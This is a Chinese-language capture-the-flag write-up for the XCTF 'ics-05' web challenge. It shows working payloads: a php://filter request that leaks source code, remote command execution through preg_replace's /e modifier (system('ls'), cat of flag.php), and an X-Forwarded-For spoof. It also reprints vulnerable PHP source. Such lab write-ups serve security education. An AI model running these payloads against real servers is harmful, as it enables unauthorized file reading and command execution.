XCTF-ics-05

打开题目，根据题目提示找到设备维护中心

点进去（其他点了都没用），没发现什么有用的东西

 

点击了云平台设备维护中心后，发现url后面多了点东西，页面上也多了点东西，这里就是突破口

随便改一下page后面传入的值，发现后面的东西会被打印在页面上，尝试php伪协议，构造payload如下

page=php://filter/read=convert.base64-encode/resource=index.php

成功读取到base64数据

base64解密，下面是一些关键的 php源码

    




    

        

    






        




        

            

                 0) {
                    die();
                }

                if (strpos($page, 'ta:text') > 0) {
                    die();
                }

                if (strpos($page, 'text') > 0) {
                    die();
                }

                if ($page === 'index.php') {
                    die('Ok');
                }
                    include($page);
                    die();
                ?>
        
        





Welcome My Admin ! 
";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }

}





?>

发现它过滤了input，所以没办法直接使用php://input来执行php代码，那么此时最后面的代码就显得十分可疑，而后面唯一能存在问题的就是preg_replace，上网搜索preg_replace漏洞，借鉴文章http://blog.topsec.com.cn/audit-defanse-2/，发现触发漏洞有两个条件
 

1、正则表达式也就是第一个参数需要e标识符，有了它可以执行第二个参数的命令​​​​​​​

2、第一个参数需要在第三个参数中的中有匹配，不然echo会返回第三个参数而不执行命令

于是自己构造payload

?pat=/0/e&rep=system('ls')&sub=0
同时抓包插入字段：
x-forwarded-for:127.0.0.1

得到当前目录下的文件和目录

发现s3chahahaDir比较可疑，于是继续ls s3chahahaDir，但是这个system里面不能写空格，于是用+代替，最后的payload就是

?pat=/0/e&rep=system('ls+s3chahahaDir')&sub=0
同时抓包插入字段：
x-forwarded-for:127.0.0.1

得到这个目录下的文件和目录

重复一次上面的步骤，在flag目录下发现flag.php文件，直接cat查看

 

?pat=/0/e&rep=system('cat+s3chahahaDir/flag/flag.php')&sub=0
同时抓包插入字段：
x-forwarded-for:127.0.0.1

 

最后再说一下坑点，直接cat查看那个可疑的名字时是没有回显的（因为是目录），这里可以用ls继续查看（别心急），或者在最开始就用ls -l查看文件属性，最前面是d就是目录，是-就是文件，后面查看到flag也别心急，多用ls查看，因为最后如果是文件的话，ls查看会显示出它的相对路径